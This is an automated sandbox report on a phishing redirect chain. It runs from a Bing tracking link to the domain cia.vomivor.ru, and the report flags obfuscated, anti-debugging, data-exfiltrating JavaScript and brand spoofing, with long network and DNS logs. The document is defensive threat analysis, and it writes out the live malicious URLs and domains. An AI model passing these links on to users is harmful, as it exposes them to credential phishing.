Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%

Overview

General Information

Sample URL:https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cue
Analysis ID:1576880

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious Javascript
AI detected suspicious URL
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 5296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6024 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1916,i,14681166411600306776,10979207420218593879,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 6432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29t" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cia.vomivor.ru/SwWHk/%23dGVzbGFAdGVzbGEuY2... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cia.vomivor.ru/SwWHk/%23dGVzbGFAdGVzbGEuY2... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated URLs and the interaction with an unknown domain 'tBZTnYZ7P65ro81mJJn8pL20TBE8aV4bxaZ6erW6vjtxM6GOe59fx.lpliwptf.ru' further increase the risk. While the script may have some legitimate functionality, such as a CAPTCHA implementation, the overall behavior is highly suspicious and indicative of potential malicious intent.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cia.vomivor.ru/SwWHk/%23dGVzbGFAdGVzbGEuY2... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external website. The combination of these behaviors suggests a malicious intent to prevent analysis and potentially compromise the user's system.
Source: EmailJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://cia.vomivor.ru
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: Form action: https://login.microsoftonline.com/organizations/oauth2/v2.0/authorize?client_id=10fa57ef-4895-4ab2-872c-8c3613d4f7fb&redirect_uri=https%3A%2F%2Fwww.microsoft.com%2Fcascadeauth%2Faccount%2Fsignin-oidc&response_type=code&prompt=none&scope=openid%20profile%20offline_access&code_challenge=WoiqQ9Wz1uMQfNOTkik87qF2aO8uxaG4cWXzl0kVvTE&code_challenge_method=S256&response_mode=form_post&nonce=638700497464990107.ZjlhY2NiNWUtODY0NC00ZDIwLWI1ZGItODI0ZjFkNzllM2JmZWNlNDk1ZDUtNjZkMS00ZmQ3LWE1OGUtNWExMzk2ZjU0MWYw&client_info=1&x-client-brkrver=IDWeb.3.2.0.0&msafed=0&claims=%7B%22compact%22%3A%7B%22name%22%3A%7B%22essential%22%3Atrue%7D%7D%7D&state=CfDJ8P_pstto1o1NgBRsh8q_Vvi3Aht0eB2Rw4To9qd7aUoCOC3E2kZrad73oGYxsTETZHYcFgoyhXw-lBqrl6OVCs4PnpWjeUrSa_KvbdiNp3IhjVGx6ZJxXsC8Ho-dQJ_Kw1BHSeD-t0IdQ1k9s8-b-0Uq_21w3CfkfcKxA82L3_dObyP13_LXyIT1bWapjWPb80T-0ONBLNPh4PsywDDK_krTCDxjKVOdCAOAPSv7n9s69ROHpQ7sHSsQnQe1pLwNyQd-HnwSeI4-mGhMKyrQuW5AdZeCUif-AM5WQrj5E0fIGpV6xY_hMaaIkJw6jEvACc5r6Q-qXX5azAfcj6V2VHXudoVMcUi6KiXnfk1KbQJ93IlhNvdMZF_AgDpCt-lkhqHP7A66VUPkm85DeEYIClvu1gtiG6bxLaKe12kFTPzHgCpq43Z1K63zNACoYqA7uxVQkPD7xzk_JjXl3tD4MRXq_SxMyyn05Ylgxa0iBnHO1o6PrlBoU6epc9NoyNcbgcBKBrxqiegy_5gz_n47SvY&x-client-SKU=ID_NET6_0&x-client-ver=8.1.0.0&sso_reload=true microsoft microsoftonline
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: Number of links: 0
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: Base64 decoded: f9accb5e-8644-4d20-b5db-824f1d79e3bfece495d5-66d1-4fd7-a58e-5a1396f541f0
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: Title: Redirecting does not match URL
Source: https://www.yuxingketang.com/collections/throw-blankets/#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tHTTP Parser: No favicon
Source: https://cia.vomivor.ru/SwWHk/%23dGVzbGFAdGVzbGEuY29tHTTP Parser: No favicon
Source: https://cia.vomivor.ru/SwWHk/%23dGVzbGFAdGVzbGEuY29tHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No <meta name="author".. found
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No <meta name="author".. found
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No <meta name="copyright".. found
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.17:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.17:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.181.0:443 -> 192.168.2.17:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49746 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 28MB
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: global trafficDNS traffic detected: DNS query: www.yuxingketang.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cia.vomivor.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: tbztnyz7p65ro81mjjn8pl20tbe8av4bxaz6erw6vjtxm6goe59fx.lpliwptf.ru
Source: global trafficDNS traffic detected: DNS query: cdn.botframework.com
Source: global trafficDNS traffic detected: DNS query: play.vidyard.com
Source: global trafficDNS traffic detected: DNS query: publisher.liveperson.net
Source: global trafficDNS traffic detected: DNS query: lpcdn.lpsnmedia.net
Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: assets.adobedtm.com
Source: global trafficDNS traffic detected: DNS query: lptag.liveperson.net
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
Source: global trafficDNS traffic detected: DNS query: mscom.demdex.net
Source: global trafficDNS traffic detected: DNS query: msftenterprise.sc.omtrdc.net
Source: global trafficDNS traffic detected: DNS query: cm.everesttech.net
Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
Source: global trafficDNS traffic detected: DNS query: accdn.lpsnmedia.net
Source: global trafficDNS traffic detected: DNS query: static-assets.fs.liveperson.com
Source: global trafficDNS traffic detected: DNS query: idsync.rlcdn.com
Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: rtd.tubemogul.com
Source: global trafficDNS traffic detected: DNS query: idpix.media6degrees.com
Source: global trafficDNS traffic detected: DNS query: rtd-tm.everesttech.net
Source: global trafficDNS traffic detected: DNS query: va.v.liveperson.net
Source: global trafficDNS traffic detected: DNS query: analytics.twitter.com
Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
Source: global trafficDNS traffic detected: DNS query: cms.quantserve.com
Source: global trafficDNS traffic detected: DNS query: servedby.flashtalking.com
Source: global trafficDNS traffic detected: DNS query: a.tribalfusion.com
Source: global trafficDNS traffic detected: DNS query: s.tribalfusion.com
Source: global trafficDNS traffic detected: DNS query: www.clarity.ms
Source: global trafficDNS traffic detected: DNS query: cms.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: px.owneriq.net
Source: global trafficDNS traffic detected: DNS query: jadserve.postrelease.com
Source: global trafficDNS traffic detected: DNS query: ds.reson8.com
Source: global trafficDNS traffic detected: DNS query: ups.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: z.clarity.ms
Source: global trafficDNS traffic detected: DNS query: bttrack.com
Source: global trafficDNS traffic detected: DNS query: dmpsync.3lift.com
Source: global trafficDNS traffic detected: DNS query: ag.innovid.com
Source: global trafficDNS traffic detected: DNS query: rtb.adentifi.com
Source: global trafficDNS traffic detected: DNS query: sync.crwdcntrl.net
Source: global trafficDNS traffic detected: DNS query: sync-tm.everesttech.net
Source: global trafficDNS traffic detected: DNS query: munchkin.marketo.net
Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: dsum-sec.casalemedia.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
